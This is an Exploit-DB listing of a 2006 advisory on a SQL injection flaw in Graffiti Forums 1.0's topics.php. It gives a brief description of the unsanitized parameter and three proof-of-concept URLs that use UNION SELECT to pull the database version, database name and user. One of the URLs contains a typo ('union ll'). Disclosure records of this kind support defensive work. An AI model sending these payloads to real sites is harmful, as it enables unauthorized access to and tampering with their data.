Graffiti Forums 1.0 - 'Topics.php' SQL Injection

EDB-ID:

28201




Platform:

PHP

Date:

2006-07-10


source: https://www.securityfocus.com/bid/18928/info

Graffiti Forums is prone to an SQL-injection vulnerability. 

This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. 

Successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

http://www.example.com/topics.php?f=-1 union all select version()--
http://www.example.com/topics.php?f=-1 union ll select database()--
http://www.example.com/topics.php?f=-1 union all select user()--